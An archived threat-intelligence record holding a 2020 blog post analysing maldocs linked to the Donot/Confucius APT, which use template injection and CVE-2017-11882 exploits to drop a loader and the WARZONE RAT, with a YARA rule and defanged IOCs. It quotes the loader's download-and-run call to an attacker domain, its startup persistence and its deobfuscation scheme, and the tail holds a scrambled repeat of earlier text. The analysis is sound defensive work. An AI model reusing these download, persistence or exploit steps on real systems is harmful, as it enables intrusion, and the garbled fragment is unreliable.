{ "id": "70691382-a008-436e-a7c5-a9261a7e6e9c", "created_at": "2026-04-06T00:13:54.123814Z", "updated_at": "2026-04-10T03:33:38.163259Z", "deleted_at": null, "sha1_hash": "36933d357cc568dc45f5601b7c4f11041ff4a94f", "title": "Do you want to bake a donut? Come on, let’s go update~ Go away, Maria.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 12315270, "plain_text": "Do you want to bake a donut? Come on, let’s go update~ Go away,\r\nMaria.\r\nBy asuna amawaka\r\nPublished: 2020-11-30 · Archived: 2026-04-05 20:48:22 UTC\r\n12 min read\r\nNov 30, 2020\r\nI have not done any proper analysis for a while now, so here I am, trying to keep my itchy fingers busy after\r\ngetting revved up by FlareOn last month.\r\nI saw this interesting post [1] and jumped right into it.\r\nPreliminary research got me these:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 1 of 35\n\nI found additional samples on VirusTotal using RTF creation date: 2019:12:26 11:48:00\r\nPress enter or click to view image in full size\r\nThese samples are related to the same threat actor because of the overlapping C2 domains used, the similarities in\r\nfile naming and the same payload deployed.\r\nAfter pivoting and researching, “Donot” and “Confucius” are two APT names that are closely related to the\r\nsamples found. I don’t have enough data on my hands to say if these two groups are the same or if they are simply\r\nsharing infrastructure. Nonetheless, I shall concentrate on technical analysis while folks with more telemetry can\r\nworry about attribution.\r\nThe maldocs deployed by the actor use the following techniques to initiate the infection: Template injection,\r\nmacros and/or exploits (e.g. CVE-2017–11882). After going through some trouble of\r\ndeobfuscation/decoding/decrypting strings and code, the final payload (AVEMARIA, aka WARZONE RAT) is\r\nfetched and executed using one of two ways. One is via a loader (comes in a pair of files made up of a DLL and a\r\nXOR-encrypted data file), which I named as DonutLoader since there is no existing catchy names for this; the\r\nother way is via a different pair of files made up of a shellcode and a gif.\r\nThis long post shall be organized in this manner:\r\nTemplate injection\r\nMalicious RTFs (walkthrough of my analysis of the shellcode deployed by the exploits) to execute\r\nDonutLoader and/or AVEMARIA\r\nMacros to execute DonutLoader\r\nDonutLoader Analysis\r\nBrief comment on AVEMARIA\r\nTemplate Injection\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 2 of 35\n\nIn the case of “Suparco Vacancy Notification.docx”, the next stage malicious RTF is downloaded via relationship\r\ntemplates.\r\nThe exact same settings.xml.rels file is observed within “Testing.docx”.\r\n“mal testin.docx” contains a different download link:\r\nMalicious RTFs and the shellcode within\r\nRTF: 8E85C62E5D7FA9A6D2E176BCA6F6526B53EBFDA6EF3DF208E1E60434BD26EFFC\r\nThe file “IN4447832” is a malicious RTF that downloads a pair of gif/shellcode files that in turns download the\r\nfinal payload. The whole series of activities is triggered with the exploitation of CVE-2017–11882. Let’s see how\r\nit’s done.\r\nAt the end of the RTF file, we can see an embedded object:\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 3 of 35\n\nExtract this object and look at it again:\r\nThere it is, an exploit for the equation editor. We can find the beginning of the exploit shellcode after identifying\r\nthe “Font record” header (0x8 denotes Font record). Put it into IDA:\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 4 of 35\n\nWe can follow where the instructor pointer goes to within a debugger. Gflags come in handy again for this. Set the\r\ndebugger for “eqnedt32.exe” to “C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb -server\r\ntcp:port=5505”, click Apply and OK.\r\nExecute the RTF file and with windbg, connect to remote session “tcp:port=5505,server=localhost”.\r\nPut a breakpoint “ba r4 0x45BD3C” (taken from the shellcode 0x1271EB44 XOR 0x12345678) which will break\r\non access read/write on the address.\r\nWhen the breakpoint hits, we see this:\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 5 of 35\n\nThe shellcode followed the addresses three times, let’s do the same and arrive at:\r\nThat looks like the MTEF data followed by font record, isn’t it? The shellcode then jumps to offset 0x43 from\r\nhere, 0x5da358 + 0x43 = 0x5DA39B.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 6 of 35\n\nNow, you know what to do. Put a breakpoint here of course.\r\n\u003e bp 0x5DA39B\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 7 of 35\n\nThe shellcode then did a little “polymorphism” and we find out that deobfuscation is done on the last 0x315 bytes\r\nof the extracted object — first a NOT, followed by XOR 0xE0.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 8 of 35\n\nAfter deobfuscation, we can then see the strings and code:\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 9 of 35\n\nAnalyzing the deobfuscated code will lead us to know that the file “updte” is another shellcode that executes code\r\n(again, XOR encrypted) in sant.gif.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 10 of 35\n\nThe decryption within updte goes like this:\r\nWhich leads to me writing this little piece of python script to assist in decrypting the gif file:\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 11 of 35\n\nAfter decryption, the data looks like the following. But somehow, some parts of it looks like they are still\r\nobfuscated…\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 12 of 35\n\nWell, IDA confirms our suspicions.\r\nEasy!\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 13 of 35\n\nRTF: 686847B331ACE1B93B48528BA50507CBF0F9B59AEF5B5F539A7D6F2246135424\r\nThe file “KB466432” is also a malicious RTF that executes a loader via exploitation of eqnedt32. This is different\r\nfrom the above RTF I analyzed.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 14 of 35\n\nA cursory look at the RTF reveals an embedded object like this:\r\nWhich turns out to be a PE named “muka.dll”. Take note of the path “C:\\Users\\Dev\\Desktop\\07082020_8570_S\\”\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 15 of 35\n\nThen there is also this other embedded object. Notice how there is a very long NOP sled within, which hints to us\r\nthat this object is some code (probably the exploit):\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 16 of 35\n\nIndeed, when we inspect this object, there’s a suspicious “tion.3” string in there, which reminds us of\r\n“Equation.3”. Very likely, we are looking at a CVE-2017–11882 or CVE-2018–0802 exploit again. Let’s see what\r\nthe exploit tries to do. We can find the beginning of the exploit shellcode after identifying the “Font record”\r\nheader.\r\nIn the earlier RTF analysis, we found an address that leads to where the MTEF data is found. Maybe use it again\r\nhere:\r\n\u003e ba r4 0x45BD3C\r\nBingo!\r\nPut a breakpoint on where the shellcode begins (in this case, 0x618efa). But it didn’t get hit. Maybe it got copied\r\nsomewhere else before getting executed? Try\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 17 of 35\n\n\u003e ba r1 0x618efa\r\nLooks like we are right!\r\n\u003e bp 0x18f318\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 18 of 35\n\nNotice that the shellcode is seeking an address 2*0x7F starting from the MTEF header (0x5B8F0 + 0x7F + 0x7F),\r\npush this address to the stack, and then return to this address.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 19 of 35\n\nTaking a quick look at the shellcode in IDA, seems that the shellcode is trying to load muka.dll.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 20 of 35\n\nConfirm this with the debugger. The shellcode calls the export “zenu” of muka.dll.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 21 of 35\n\nIt turns out that muka.dll is a DonutLoader. I’ll get to its analysis in awhile.\r\nMacros and DonutLoader\r\nDonutLoader can also be embedded within the maldoc and executed via macro.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 22 of 35\n\nmacro\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 23 of 35\n\nembedded object 1 filename\r\nembedded object 2 filename\r\nWithin 1d9ede11b34a20d4947f01432cea088dbefa911f02afaae9095673f56a76eafa, there are 2 embedded objects\r\n(as shown in screen captures above):\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 24 of 35\n\n· C:\\Users\\Dev\\AppData\\Local\\Temp\\written.dll\r\n· C:\\Users\\Dev\\AppData\\Local\\Temp\\s\r\nGet asuna amawaka’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nNote also the paths “C:\\Users\\Dev\\Desktop\\Macro_Xls_1704_S” and\r\n“C:\\Users\\Dev\\Desktop\\01052020_MacroXlsEmb_S” which will help us to find more samples.\r\nWritten.dll is a PE in plain, while s is a 0x98-XORed PE.\r\nembedded object 1: written.dll\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 25 of 35\n\nembedded object 2: s\r\nThese files are DonutLoaders. OK, coming up next is their analysis finally!\r\nDonutLoader\r\nThe name came about because I repeatedly mistyped the group name “Donot” as “Donut” when writing notes\r\nabout these samples. Folks at PTSecurity [2] did analysis on some similar samples and called them “Lo2 loaders”.\r\nFrom the RTFs I found from VirusTotal, most of them have a pair of files embedded — a DLL and a XOR-encoded data file. The following collates all the DonutLoader samples that I looked at.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 26 of 35\n\nThe DLL binaries make use of base64 and XOR operations to obfuscate its configuration data/strings so that our\r\nlives become a little bit harder.\r\nI was able to decode strings from these binaries with the help of a small python script:\r\nPress enter or click to view image in full size\r\nThis python script does the same thing as the one found in PT Security’s article, which said that this algorithm has\r\nbeen in use since October 2019.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 27 of 35\n\nThere is one binary that is “odd”. It had the latest compilation datetime amongst the files I looked at (which were\r\ncompiled around Jun/Jul 2020). It uses a different algorithm to decode the strings.\r\nPress enter or click to view image in full size\r\nFrom within the DLL, the XOR-encoded file is read, decoded and executed.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 28 of 35\n\nWithin this second XOR-encoded executable, the same tricks are used to obfuscate strings from our prying eyes,\r\nconsisting of base64 and XOR encoding, as well as byte additions. Interestingly, not all the strings can be\r\ndecoded. But from what could be decoded, we can see where the next stage malware is downloaded from.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 29 of 35\n\nmuka.dll (SHA256: 1C41A03C65108E0D965B250DC9B3388A267909DF9F36C3FEFFFBD26D512A2126)\r\n(This file came from the RTF “KB466432”, SHA256:\r\n686847B331ACE1B93B48528BA50507CBF0F9B59AEF5B5F539A7D6F2246135424, analyzed above)\r\nThis particular DonutLoader is more straightforward that those that occur in a pair. It uses just one type of string\r\nobfuscation:\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 30 of 35\n\nA quick look at the deobfuscated strings:\r\nAt runtime, the strings are used in the following manner:\r\nCreateDirectoryA(“C:/intel”, ..)\r\nURLDownloadToFileA(…, “hxxp://wordupdate.com/recent/update”, “C:/intel/new.exe”, …)\r\nPersistence is established with a shortcut to execute new.exe at startup:\r\n“C:/Users/user/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/new.lnk”\r\nAVEMARIA\r\nThe final payload malware is in fact WARZONE RAT (researchers named it AVEMARIA because of this string\r\nfound within earlier versions of the RAT). Many folks have done analysis on this RAT so I’m not going to go into\r\ndeepdive.\r\nSome findings that I found interesting regarding the AVEMARIAs executed by DonutLoader:\r\nThe PDB path is intentionally misleading. That path “VCSamples-master\\VC2010Samples\\ATL\\General\\ATLCollections\\Client” is identical to Microsoft’s “VCSample”\r\nproject on Github and the executable has nothing to do with what the path describes. I found lots of other\r\nAVEMARIAs based on PDBs like this. This could be part of the builder/encrypter in the WARZONE suite.\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 31 of 35\n\nPress enter or click to view image in full size\r\nMicrosoft’s VCSamples project on Github\r\nThe actual AVEMARIA payload (the one that calls back to the C2) is decoded and executed in memory and\r\nI dumped it to look at the strings. The keyword “warzone160” can be found, and this dumped executable\r\nmatches YARA rules describing AVEMARIA.\r\nMany more similar AVEMARIAs calling back to the same C2 can be found on VirusTotal, with relations to\r\nthe known domain names used by the maldocs/DonutLoaders. Looks like AVEMARIA is a tool of choice\r\nto this APT group.\r\nLast words\r\nAnalyzing this set of malicious docs and executables has been fun, I’ll just leave you all with a set of IOCs and\r\nYARA rule for detecting DonutLoader. If anyone is interested to discuss, DM me on Twitter!\r\nimport “pe”\r\nrule MAL_DonutLoader_DonotAPT {\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 32 of 35\n\nmeta:\r\nauthor = “Asuna Amawaka”\r\ndescription = “This rule hopes to capture parents of DonutLoader as well as DonutLoader binaries”\r\ndate = “30 Nov 2020”\r\nstrings:\r\n$filename1 = “wavs.bin” wide ascii nocase\r\n$filename2 = “ogg.bin” wide ascii nocase\r\n$filename3 = “muka.dll” wide ascii nocase\r\n$filename4 = “linknew.dll” wide ascii nocase\r\n$filename5 = “kpryt.dll” wide ascii nocase\r\n$filename6 = “cvent.dll” wide ascii nocase\r\n$filename7 = “trui19o2.dll” wide ascii nocase\r\n$filename8 = “lioj86.dll” wide ascii nocase\r\n$filename9 = “fuitel.dll” wide ascii nocase\r\n$filename10 = “dpur.dll” wide ascii nocase\r\n$filename11 = “mecru.dll” wide ascii nocase\r\n$filename12 = “eupol.dll” wide ascii nocase\r\n$filename13 = “mentn.dll” wide ascii nocase\r\n$filename14 = “made.dll” wide ascii nocase\r\n$filename15 = “notr.dll” wide ascii nocase\r\n$filename16 = “vetu.dll” wide ascii nocase\r\n$filename17 = “detr.dll” wide ascii nocase\r\n$filename18 = “bese.dll” wide ascii nocase\r\n$filename19 = “NumberAlgo.dll” wide ascii nocase\r\n$filename20 = “JacaPM.dll” wide ascii nocase\r\n$filename21 = “maroork.dll” wide ascii nocase\r\n$filename22 = “fli0.dll” wide ascii nocase\r\n$filename23 = “nuityr.dll” wide ascii nocase\r\n$filename24 = “jgasf.dll” wide ascii nocase\r\n$filename25 = “tuyrt.dll” wide ascii nocase\r\n$filename26 = “lefbu.dll” wide ascii nocase\r\n$filename27 = “pult.dll” wide ascii nocase\r\n$filename28 = “quep.dll” wide ascii nocase\r\n$filename29 = “nmwell.dll” wide ascii nocase\r\n$filename30 = “yello.dll” wide ascii nocase\r\n$filename31 = “lokr.js” wide ascii nocase\r\n$filename32 = “falin.js” wide ascii nocase\r\n$filename33 = “obile.js” wide ascii nocase\r\n$filename34 = “vqiw.js” wide ascii nocase\r\n$filename35 = “gb.bat” wide ascii nocase\r\n$filename36 = “iksm.bat” wide ascii nocase\r\n$filename37 = “trrt.bat” wide ascii nocase\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 33 of 35\n\n$filename38 = “blo.bat” wide ascii nocase\r\n$filename39 = “SystemService.exe” wide ascii nocase\r\n$path1 = “C:\\\\Users\\\\Dev\\\\Desktop\\\\07082020_8570_S\\\\” wide ascii nocase\r\n$path1_wild = {5c 55 73 65 72 73 5c 44 65 76 5c 44 65 73 6b 74 6f 70 5c [8] 5f [4] 5f 53 5c}\r\n$path2 = “AppData\\\\Roaming\\\\EvMGR” wide ascii nocase\r\n$path3 = “C:\\\\Users\\\\Dev\\\\Desktop\\\\Macro_Xls_1704_S” wide ascii nocase\r\n$path3_wild = {5c 55 73 65 72 73 5c 44 65 76 5c 44 65 73 6b 74 6f 70 5c 4d 61 63 72 6f 5f 58 6c 73 5f\r\n[4] 5f 53}\r\n$path4 = “C:\\\\Users\\\\Dev\\\\Desktop\\\\01052020_MacroXlsEmb_S” wide ascii nocase\r\n$path4_wild = {5c 55 73 65 72 73 5c 44 65 76 5c 44 65 73 6b 74 6f 70 5c [8] 5f 4d 61 63 72 6f 58 6c\r\n73 45 6d 62 5f 53}\r\n$str1 = “MJuego” wide ascii nocase\r\n$str2 = “0007E9E4CE4D” wide ascii nocase\r\n$str3 = “Bensun” wide ascii nocase\r\n$str4 = “Menner” wide ascii nocase\r\n$pdbpath1 =\r\n“Soft\\\\DevelopedCode_Last\\\\BitDefenderTest\\\\m0\\\\New_Single_File\\\\Lo2\\\\SingleV2\\\\Release\\\\BinWork.pdb”\r\nwide ascii nocase\r\n$pdbpath1_wild = {5c 53 6f 66 74 5c 44 65 76 65 6c 6f 70 65 64 43 6f 64 65 5f 4c 61 73 74 5c 42 69\r\n74 44 65 66 65 6e 64 65 72 54 65 73 74}\r\n$pdbpath2 = “Users\\\\admin\\\\Documents\\\\dll\\\\linknew\\\\Release\\\\linknew.pdb” wide ascii nocase\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 600KB and ((1 of ($filename*)) or (any of ($path*, $str*,\r\n$pdbpath*)) or pe.exports(“zenu”) or pe.exports(“flis”) or pe.exports(“jrgbeg”) or pe.exports(“csytu”)\r\nor pe.exports(“neeu”) or pe.exports(“vile”))\r\n}\r\nwordupdate[.]com/recent/update\r\ncheaperlive[.]xyz/xolto/mikix\r\ntampotrust[.]top/tax/lodi/pkra\r\nremindme[.]top/tax/lodi/pkra\r\nrecent.wordupdate[.]com/ver/update12/KB466432\r\nthe-moondelight[.]96[.]lt/latest/updte\r\nthe-moondelight[.]96[.]lt/optra/sant.gif\r\nthe-moondelight[.]96[.]lt/latest/version/secure/download/IN4447832\r\nthe-moondelight[.]96[.]lt/windw-sec/append\r\n1C41A03C65108E0D965B250DC9B3388A267909DF9F36C3FEFFFBD26D512A2126\r\n8CFBFECFE475C3621277EE7F680E3A0CB9C650802363DAA256C1057ADFB817A9\r\n7A987295229D2514D99916D53F196B87758CE08FD8621CF68BC419DC99B80D6D\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 34 of 35\n\nD279DDB6B2A566BC24E789B5181663491B8C2818CB91E28AAE5721DCB0BF30B6\r\nAB04BF258CF71B4A1CB934491CF942ECDA0EC82D4F6A80B5108D7607BE6FC2BE\r\n7F4B7D0C6076E197A509C01C0794EBC450229FF5D555BE8D7F89F98B3C43A298\r\n684F68429F8BAC224E6FDC68195C89B54BA469FBCC2184EC2B5FC689E585CA54\r\n0EA05331E775DE6B329FF1FA22F11809C2C1BCB6E17683552219CB32F52A47F5\r\n83847C527F713B6E13849028D66B08686ADDE26B8E9ECD8DDC78AD178EF7BDCB\r\nE291A146F79D927D18392A04D238D829C0DF156410E4D93636AEE1B5663DB914\r\nE6753EB498F58F95C8FC931B6CD53647CE2F4F8F7AD4274C22CA2B6284FB5308\r\n67C0C937E049083193649449519A57E42945CA2ABE19756F4E76D95CAA44A062\r\n70D41C8C25CB8E75296576D3DBB37720E03F96691691763953FEA0FE00F50EB4\r\n9B34F53DDC20D5EA2F7B47818ED2E7D626948256268CB4E2B11E47ECAF9A839A\r\n891ACF7B729183945F209C915BA2BB57B541E2EA350899A541DB9A63428711A5\r\nFB46324757D0EC8B0AC02729E281E47EF1C367DEED483F14481441C2F9B6CA34\r\n66F3134E3E040F50ED59629379C0750D896969ACFDC55105BE7FEF81839BA035\r\n1C4B8A1F48FF1B9511AEC0704983E45242F01C2109AB4602F7952481429DDC84\r\n88672DF33B02275660EC3995F3BAD63FE994C09BA8E978E7F18D4F8C9A97637A\r\n7609034E7473869B3A5767F9543B6067998F4DB68E3BA26966C115535337337F\r\nADE6D291C870A9F59D4A22FF4D61E6B2A913538701517E8D0AA275855FD80A76\r\nE99AE9163F6DBBA22E1357C2164EB0F9971A264A481813EC11DC598784435B95\r\n1E6E568E2FCCFEB2E0275982D5637E0BE6D0BA4575685126D957061BF2D19678\r\n4C5C43F4932AC497C716BB5EC30A7636E5056775A4D5F3F48B9E5C1414B9F7B3\r\n7305E08AB7812F44EA42E89AE7D473B1F373C151CA8D12F77B79E85C942366FC\r\n59CCFFF73BDB8567E7673A57B73F86FC082B0E4EEAA3FAF7E92875C35BF4F62C\r\nA3CD781B14D75DE94E5263CE37A572CDF5FE5013EC85FF8DAEEE3783FF95B073\r\n904E966DA7B38514F6AC23BBA1DAC1858888CD48FA77B73C770156B19A88A4C8\r\n8E85C62E5D7FA9A6D2E176BCA6F6526B53EBFDA6EF3DF208E1E60434BD26EFFC\r\n5C9477C16DF8EF4434C042E69B473A44452CAEE96219A56EB2DA30F0B5E85976\r\n686847B331ACE1B93B48528BA50507CBF0F9B59AEF5B5F539A7D6F2246135424\r\n1D9EDE11B34A20D4947F01432CEA088DBEFA911F02AFAAE9095673F56A76EAFA\r\nSource: https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 35 of 35\n\nThe shellcode That looks like followed the the MTEF addresses three data followed times, let’s do by font record, the same and isn’t it? The shellcode arrive at: then jumps to offset 0x43 from\nhere, 0x5da358 + 0x43 = 0x5DA39B. \n Page 6 of 35\n\n https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1 \nA cursory look at the RTF reveals an embedded object like this: \nWhich turns out to be a PE named “muka.dll”. Take note of the path “C:\\Users\\Dev\\Desktop\\07082020_8570_S\\”\n Page 15 of 35", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1" ], "report_names": [ "do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4", "created_at": "2025-08-07T02:03:25.123407Z", "updated_at": "2026-04-10T02:00:03.668131Z", "deleted_at": null, "main_name": "ZINC EMERSON", "aliases": [ "Confucius ", "Dropping Elephant ", "EHDevel ", "Manul ", "Monsoon ", "Operation Hangover ", "Patchwork ", "TG-4410 ", "Viceroy Tiger " ], "source_name": "Secureworks:ZINC EMERSON", "tools": [ "Enlighten Infostealer", "Hanove", "Mac OS X KitM Spyware", "Proyecto2", "YTY Backdoor" ], "source_id": "Secureworks", "reports": null }, { "id": "7a8dbc5e-51a8-437a-8540-7dcb1cc110b8", "created_at": "2022-10-25T16:07:23.482856Z", "updated_at": "2026-04-10T02:00:04.627414Z", "deleted_at": null, "main_name": "Confucius", "aliases": [ "G0142" ], "source_name": "ETDA:Confucius", "tools": [ "ApacheStealer", "ByeByeShell", "ChatSpy", "Confucius", "MY24", "Sneepy", "remote-access-c3", "sctrls", "sip_telephone", "swissknife2" ], "source_id": "ETDA", "reports": null }, { "id": "caf95a6f-2705-4293-9ee1-6b7ed9d9eb4c", "created_at": "2022-10-25T15:50:23.472432Z", "updated_at": "2026-04-10T02:00:05.352882Z", "deleted_at": null, "main_name": "Confucius", "aliases": [ "Confucius", "Confucius APT" ], "source_name": "MITRE:Confucius", "tools": [ "WarzoneRAT" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434434, "ts_updated_at": 1775792018, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/36933d357cc568dc45f5601b7c4f11041ff4a94f.pdf", "text": "https://archive.orkl.eu/36933d357cc568dc45f5601b7c4f11041ff4a94f.txt", "img": "https://archive.orkl.eu/36933d357cc568dc45f5601b7c4f11041ff4a94f.jpg" } }